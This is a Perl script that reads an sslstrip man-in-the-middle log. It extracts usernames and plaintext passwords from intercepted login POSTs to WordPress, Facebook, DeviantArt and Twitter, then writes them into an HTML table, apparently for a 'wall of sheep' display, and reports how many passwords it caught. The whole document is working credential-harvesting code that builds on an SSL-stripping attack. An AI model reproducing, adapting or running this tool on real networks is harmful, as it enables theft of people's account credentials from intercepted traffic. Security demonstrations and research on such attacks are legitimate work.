#!/usr/bin/perl

$caught=0;

# set debug = 1 to echo all logins in a raw, messy format
$debug = 0;

# Delimiting characters for recognized sites
@delim = ( ["(wordpress.com):", "log=", "pwd="],
           ["(login.facebook.com):", "email=", "pass="],
           ["(www.deviantart.com):", "username=", "password="],
           ["(twitter.com):", "session%5Busername_or_email%5D=", 
              "session%5Bpassword%5D="],
          );
$numsites = 4;

# open output file named wall.html in current directory, empty it first
if ($debug==1) {print "Opening output file wall.html\n";}
my $opened = open (OUTFILE, ">wall.html");
if ( ! $opened ) {
   print "Cannot open wall.html to empty it!\n";
   exit 1;
   }
print OUTFILE "<table align='center'>\n";
close (OUTFILE);

my $opened = open (OUTFILE, ">>wall.html");
if ( ! $opened ) {
   print "Cannot open wall.html to append to it!\n";
   exit 1;
   }

# open output file named raw.html in current directory, empty it first
if ($debug==1) {print "Opening output file raw.html\n";}
my $opened = open (RAWFILE, ">raw.html");
if ( ! $opened ) {
   print "Cannot open raw.html to empty it!\n";
   exit 1;
   }
print RAWFILE "<table align='center'>\n";
close (RAWFILE);

my $opened = open (RAWFILE, ">>raw.html");
if ( ! $opened ) {
   print "Cannot open raw.html to append to it!\n";
   exit 1;
   }

# Formats of known vulnerable Web sites in this order:
#  URL string, Login prefix, Password prefix
#  @format = ( ["(wordpress.com)",

#read sslstrip.log in to the implied catchall variable $_ line by line
if ($debug==1) {print "Opening input file sslstrip.log\n";}
my $opened = open (FILE, "sslstrip.log");
if ( ! $opened ) {
   print "Cannot open sslstrip.log to read it!\n";
   exit 1;
   }
while (<FILE>) {
   chomp;
   ($date, $time, $post, $data, $site, $url) = split(" ");
   if ($post eq "POST" && $data eq "Data") { 
      $caught = $caught + 1;
      if ($debug==1) {print "Date: $date Time: $time POST=$post Data=$data Site=$site 
URL=$url\n";}
      for ($row=0; $row<$numsites; $row++) {
         if ($site eq "$delim[$row][0]") {
            if ($debug==1) {print "LOGIN FOUND: URL=$url\n";}
            ($junk, $goodies) = split(/$delim[$row][1]/, $url);
            if ($debug==1) {print "GOODIES=$goodies\n";}
            ($name, $passpart) = split(/&/, $goodies);
            if ($debug==1) {print "NAME=$name PASSPART=$passpart\n";}
            ($junk, $password) = split(/$delim[$row][2]/, $passpart);
            print OUTFILE "<tr><td>SITE: $delim[$row][0]</td>";
            print OUTFILE "<td>NAME: $name</td><td>PASSWORD: $password</td></tr>\n";
            }
         }
      print RAWFILE "<tr><td>$_</td>";
      }
   }
close (FILE);

# End HTTP Page
print OUTFILE "</table>";
close (OUTFILE);

# End HTTP Page
print RAWFILE "</table>";
close (RAWFILE);

print "Passwords caught: $caught\n";
exit;
